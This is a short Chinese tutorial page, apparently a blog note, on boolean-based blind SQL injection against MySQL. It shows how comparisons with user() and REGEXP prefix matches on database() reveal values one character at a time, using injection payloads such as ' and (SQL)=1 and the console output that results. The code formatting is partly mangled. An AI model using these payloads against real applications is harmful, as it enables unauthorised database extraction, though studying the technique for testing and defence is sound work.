Mysql盲注时的判断方法,REGEXP逐个匹配

previous page next page 
        
    
          
  1. 
            
              mysql
              >
               select 
              *
               
              from
               test where id 
              =
              1
               
              and
               
              (
              
                select user
              
              ())
               
              
                
                  >
                
                 
              
              'roo'
              ;
            
          
    2. 
          
  2. 
            
              +------+------+
            
          
    3. 
          
  3. 
            
              |
               id   
              |
               name 
              |
            
          
    4. 
          
  4. 
            
              +------+------+
            
          
    5. 
          
  5. 
            
              |
                  
              1
               
              |
               bma  
              |
            
          
    6. 
          
  6. 
            
              |
                  
              1
               
              |
               a
              '   |
            
          
    7. 
          
  7. 
            
              |    1 | bma  |
            
          
    8. 
          
  8. 
            
              +------+------+
            
          
    9. 
          
  9. 
            
              3 rows in set (0.00 sec)
            
          
    10. 
          
  10. 
            
          
    11. 
          
  11. 
            
              mysql> select * from test where id =1 and (select user()) > '
              rox
              ';
            
          
    12. 
          
  12. 
            
              Empty set (0.00 sec)
            
          
    13.
尝试这样:
' and (SQL)=1 
  1. and (select database() REGEXP 'mys')=1
sql 规律如下,用boolean 盲注
mysql> select database() REGEXP 'm';        //用正则来判断
+-----------------------+
| database() REGEXP 'm' |
+-----------------------+
|                     1 |
+-----------------------+
1 row in set (0.00 sec)
mysql> select database() REGEXP 'my';
+------------------------+
| database() REGEXP 'my' |
+------------------------+
|                      1 |
+------------------------+
1 row in set (0.00 sec)

mysql> select database() REGEXP 'mys';
+-------------------------+
| database() REGEXP 'mys' |
+-------------------------+
|                       1 |
+-------------------------+
1 row in set (0.00 sec)

mysql> select database() REGEXP 'mysq';
+--------------------------+
| database() REGEXP 'mysq' |
+--------------------------+
|                        1 |
+--------------------------+
1 row in set (0.00 sec)
previous page start next page